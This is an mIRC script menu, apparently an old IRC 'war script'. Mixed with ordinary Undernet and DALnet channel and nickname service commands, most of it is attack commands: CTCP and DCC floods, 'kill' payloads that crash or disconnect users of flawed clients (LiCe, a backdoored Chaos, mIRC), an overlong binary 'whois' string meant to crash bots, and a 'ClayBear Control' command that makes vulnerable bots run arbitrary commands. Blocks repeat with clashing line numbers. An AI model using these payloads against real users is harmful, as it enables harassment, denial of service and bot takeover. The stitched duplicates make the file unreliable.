n303=..&CTCP Flood:/.timer 5 5 /privmsg # VERSION | /.timer 5 5 /privmsg # PING | /.timer 5 5 /privmsg # ECHO K-LiNeD RuLz FTP To FTP.ONRAMP.NET /incoming for the newest version of k-lined so you can flood me back | /.timer 5 5 /privmsg # USERINFO
n304=..DCC Fire &Bomb:/dccbomb /dccbomb /dccbomb
n305=..DCC &Flood:/privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT
n359=..&Eggdrop Find:/msg $ $+ $server This is a serverwide test for bots, please don't reply or you may be mistaken for one and k-lined | /msg $ $+ $server hello bots! | /msg $ $+ $server email blah@blah.net | /msg $ $+ $server ident blah
n360=..&Alternate Eggdrop Find:/who */msg*
n361=..&Johbots:/who *=*=*
n363=.S&quit:/squit $$?="Enter Server (Wild Cards ok:)" $$?="Enter Reason:"
n364=&Bot Controls
n365=.&Undernet (X Commands)
n366=..&X topic:/msg X topic # $$?="Enter topic:"
n367=..&Access Check:/msg X access # $$?="Nick:"
n368=..Add user (&No Pass):/msg X adduser # $$?="Nick:" $$?="Address:" $$?="Access:"
n369=..Add user (&With Pass):/msg X adduser # $$?="Nick:" $$?="Address:" $$?="Access:" $$?="Password:"
n370=..&Remove user:/msg X remuser # $$?="Nick or Address:"
n371=..&Ban List:/msg X lbanlist # *
n372=..&Mass deop set:/msg X set # MassDeopPro $$?="Add Number for Massdeop protect:"
n373=..Ni&ck Change set:/msg X set # NickFloodPro $$?="Add Number for Nick Change flood protect:"
n374=..No &op Mode
n375=...&On:/msg X set # noop on
n376=...O&ff:/msg X set # noop off
n377=.&Undernet (W Commands)
n378=..&W topic:/msg W topic # $$?="Enter topic:"
n379=..&Access Check:/msg W access # $$?="Nick:"
n380=..Add user (&No Pass):/msg W adduser # $$?="Nick:" $$?="Address:" $$?="Access:"
n381=..Add user (&With Pass):/msg W adduser # $$?="Nick:" $$?="Address:" $$?="Access:" $$?="Password:"
n382=..&Remove user:/msg W remuser # $$?="Nick or Address:"
n383=..&Ban List:/msg W lbanlist # *
n384=..&Mass deop set:/msg W set # MassDeopPro $$?="Add Number for Massdeop protect:"
n385=..Ni&ck Change set:/msg W set # NickFloodPro $$?="Add Number for Nick Change flood protect:"
n386=..No &op Mode
n387=...&On:/msg W set # noop on
n388=...O&ff:/msg W set # noop off
n389=.DalNet - &NickServ Stuff
n390=..Get &Help:/msg nickserv help
n391=..&Register:/msg nickserv register $$?="What Password To Use:"
n392=..&Identify:/msg nickserv identify $$?="Whats Your Password?"
n394=...Access List:/msg nickserv access list $$?="Nick To List:"
n395=...Add:/msg nickserv access add $$?="User@Address to Add?"
n396=...Delete:/msg nickserv access del $$?="User@Address to Remove?"
n397=..&Recover:/msg nickserv recover $$?="Nick To Recover:" $$?="Whats Your Password?"
n398=..&Ghost:/msg nickserv ghost $$?="Nick To Fix:" $$?="Whats Your Password?"
n399=..&Drop:/msg nickserv drop $$?="Nick To Drop:"
n400=..&List:/msg nickserv list $$?="Nick or Address to Search For:"
n401=..&Info:/msg nickserv info $$?="Get Info On What Nick?"
n402=..Re&lease:/msg nickserv release $$?="Release What Nick?"
n404=...Kill:/msg nickserv set kill $$?="On or Off?"
n405=...Password:/msg nickserv ser passwd $$?="New Password to Use?"
n406=...URL:/msg nickserv set url $$?="URL To Associate With:"
n407=.DalNet - &ChanServ Stuff
n408=..Get &Help:/msg chanserv help
n409=..&Register:/msg chanserv register # $$?="Password To Use:" $$?="Description To Use:"
n411=...Add:/msg chanserv sop # add $$?="Nick Or Mask To Add:"
n412=...Delete:/msg chanserv sop # del $$?="Nick Or Mask To Delete:"
n413=...List:/msg chanserv sop # list
n415=...Add:/msg chanserv aop # add $$?="Nick Or Mask To Add:"
n416=...Delete:/msg chanserv aop # del $$?="Nick Or Mask To Delete:"
n417=...List:/msg chanserv aop # list
n419=...Add:/msg chanserv akick # add $$?="Nick Or Mask To Add:"
n420=...Delete:/msg chanserv akick # del $$?="Nick Or Mask To Delete:"
n67=..&CTCP Flood:/.timer 5 5 /privmsg # VERSION | /.timer 5 5 /privmsg # PING | /.timer 5 5 /privmsg # ECHO K-LiNeD RuLz FTP To FTP.ONRAMP.NET /incoming for the newest version of k-lined so you can flood me back | /.timer 5 5 /privmsg # USERINFO
n68=..DCC Fire &Bomb:/dccbomb /dccbomb /dccbomb
n69=..DCC &Flood:/privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT
n124=..&LiCe pre v1.3plFIX Kill:/raw -q notice $1 :[Vampear] use /SERVER to reconuse /SERVER to conneuse /SERVER to reconuse /SERVER to conne | /echo 6 %recho LiCe Kill sent to $1 $+ . If $1 is running LiCe 1.3 (non-FIXED), $1 is gone.
n125=..&Chaos BackDoor:/ctcp $1 rquit | /echo 6 %recho Chaos Kill sent to $1 $+ . If $1 is using the backdoored Chaos, $1 is dead.
n130=..&Lame mIRC Kill:/ctcp $1 do /quit $me is da bomb. | /ctcp $1 quit | /ctcp $1 die | /ctcp $1 kill | /ctcp $1 join 0 | /ctcp $1 do quit $me is da bomb. | /echo 6 %recho Sending $1 a series of CTCPs to possibely find a lame hole in their script/bot.Most likely a mIRC user.
n131=.B&ot Hacks/Kills
n133=...EOF:/msg $1 Hello | /.timer 3 3 /msg $1 whois 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ^3╥ëVëV╕V45V4ìNï╤═Ç3└@═ÇΦ╫ | /echo 6 %recho Attemping to cause this bot to read error. This bot MUST respond to "hello" and must NOT have whois binded out.
n152=...ClayBear &Control:/ctcp $1 do $?="Enter command you want the bot to do:" | /echo 6 %recho ClayBear (and other lame mIRC bot) Hack. Forcing Bot to: $! $+ .
n153=...ClayBear &Kill:/ctcp $1 do quit my owner sucks.
n139=...O&ff:/.timer1 off | /.timer2 off | /.timer3 off | /.timer4 off | /.timer5 off | /.timer6 off | /.timer7 off | /.timer8 off | /.timer9 off | /.timer10 off | /.timer11 off | /ignore -r $$1
n140=..&Fire Bomb:/.timer $?="Enter Number Of Times:" 1 /privmsg $1 dcc send $?="Enter Message:" 1 2
n218=..&LiCe pre v1.3plFIX Kill:/raw -q notice $1 :[Vampear] use /SERVER to reconuse /SERVER to conneuse /SERVER to reconuse /SERVER to conne | /echo 6 %recho LiCe Kill sent to $1 $+ . If $1 is running LiCe 1.3 (non-FIXED), $1 is gone.
n219=..&Chaos BackDoor:/ctcp $1 rquit | /echo 6 %recho Chaos Kill sent to $1 $+ . If $1 is using the backdoored Chaos, $1 is dead.
n224=..&Lame mIRC Kill:/ctcp $1 do /quit $me is da bomb. | /ctcp $1 quit | /ctcp $1 die | /ctcp $1 kill | /ctcp $1 join 0 | /ctcp $1 do quit $me is da bomb. | /echo 6 %recho Sending $1 a series of CTCPs to possibely find a lame hole in their script/bot.Most likely a mIRC user.
n225=.B&ot Hacks/Kills
n227=...EOF:/msg $1 Hello | /.timer 3 3 /msg $1 whois 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉÉδ^3╥ëVëV╕V45V4ìNï╤═Ç3└@═ÇΦ╫ | /echo 6 %recho Attemping to cause this bot to read error. This bot MUST respond to "hello" and must NOT have whois binded out.
n246=...ClayBear &Control:/ctcp $1 do $?="Enter command you want the bot to do:" | /echo 6 %recho ClayBear (and other lame mIRC bot) Hack. Forcing Bot to: $! $+ .
n247=...ClayBear &Kill:/ctcp $1 do quit my owner sucks.
n222=..&CTCP Flood:/.timer 5 5 /privmsg # VERSION | /.timer 5 5 /privmsg # PING | /.timer 5 5 /privmsg # ECHO K-LiNeD RuLz FTP To FTP.ONRAMP.NET /incoming for the newest version of k-lined so you can flood me back | /.timer 5 5 /privmsg # USERINFO
n223=..DCC Fire &Bomb:/dccbomb /dccbomb /dccbomb
n224=..DCC &Flood:/privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT | /privmsg # DCC SEND ^^^^ Fire FIGHT